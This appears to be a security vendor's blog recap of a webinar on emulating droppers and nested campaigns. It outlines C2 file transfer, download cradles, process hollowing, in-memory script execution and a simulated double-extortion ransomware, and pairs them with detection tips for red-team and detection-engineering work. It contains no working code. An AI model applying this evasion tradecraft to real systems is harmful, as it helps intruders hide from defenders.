In a recent Threat Thursday Live session, the team at SCYTHE delved into a recurring question from users and workshop attendees: How do you emulate nested campaigns, especially in scenarios involving droppers and second-stage payloads? Whether you're using SCYTHE or another command-and-control (C2) framework, this guide walks you through several techniques that simulate threat actors launching secondary implants or campaigns.
What Are Nested Campaigns?
Nested campaigns mimic a realistic threat scenario where a primary payload (often referred to as a "dropper") launches additional payloads. This approach reflects how adversaries limit each component’s functionality for stealth and evasion. Rather than having a single implant carry out an entire attack chain, tasks are split among multiple binaries or scripts.
This method:
- Distributes malicious actions across multiple payloads.
- Obscures attribution by breaking direct ties between initial access and final impact.
- Adds realism to red team engagements and detection engineering exercises.
Emulating Droppers in SCYTHE
In the session, five core techniques were demonstrated to emulate these behaviors using Scythe’s capabilities.
1. Ingress Tool Transfer via C2
Method: Using SCYTHE’s virtual file system (VFS), a prebuilt executable (drop.exe) is transferred to the target machine via an existing C2 channel.
Execution: The executable is stored in the user's Downloads folder and executed using PowerShell.
Detection Tip: Because the file is pulled directly from an established C2 channel, there is no internet activity—making it harder to detect via conventional download monitoring.
2. WGET Cradle with Direct Download Link
Method: Utilizing a direct download link generated in SCYTHE, the dropper binary is retrieved via a wget PowerShell command and executed.
Customization: These links can point to EXE, DLL, or client/hosted files, depending on your campaign's needs.
3. Hosting Executables in the Public VFS
Method: Instead of direct download links, the binary is hosted in the public-facing VFS directory.
Benefit: Allows file staging externally and mimics use of redirectors or compromised web servers. You can further disguise your download origin or pre-process the file with obfuscation tools like Donut.
4. Process Hollowing
Method: The downloaded campaign (converted into shellcode) is injected into a legitimate process (e.g., calc.exe), using process hollowing.
Why It Matters: This technique helps evade detection by making malicious activity appear to originate from a benign process.
Detection Tip: Look for suspicious parent-child relationships (e.g., calc.exe unexpectedly launching PowerShell or another implant).
5. In-Memory Execution of PowerShell Scripts
Method: Use the Invoke-Expression (IEX) method to run scripts like SharpHound.ps1 directly from memory, avoiding disk writes.
Hosting: Scripts are hosted in the public VFS and pulled into the PowerShell session via HTTP.
Detection Tip: While command-line arguments are still logged, the script itself isn’t written to disk, requiring memory inspection or behavioral analysis for detection.
Bonus: Script Execution via UpShell
Method: A PowerShell script hosted in the VFS executes a wget download and starts the process, all managed via UpShell (unmanaged PowerShell), further reducing visibility.
Detection Consideration: Only the dropped file is written to disk; the command execution and download activities are often invisible to script block logging and process creation logs.
Real-World Application: Simulating Double-Extortion Ransomware
The team also demonstrated a small ransomware emulation as the dropped campaign:
- Creates a directory named ransom.
- Populates it with dummy files.
- Compresses and uploads them.
- Encrypts the local copies, emulating double-extortion tactics used by modern ransomware groups.
Detection Engineering Tips
Detection efforts should focus on:
File Creations by PowerShell/CMD. Monitoring these can surface suspicious droppers.
Command-Line Arguments. Look for unusual use of wget, IEX, or PowerShell re-invocation.
Process Trees. Tools like Splunk’s PSTree plugin or EDR platforms help visualize suspicious process hierarchies (e.g., PowerShell → Dropper → Calc.exe → PowerShell).
Anomalous Behavior from Common Binaries. Applications like calc.exe or chrome.exe should not spawn multiple child processes.
Final Thoughts
This walkthrough highlights just a few ways to simulate nested campaigns, from overt to highly stealthy techniques. While demonstrated using Scythe, many of these approaches are applicable across other platforms like Cobalt Strike, Empire, or custom tooling.
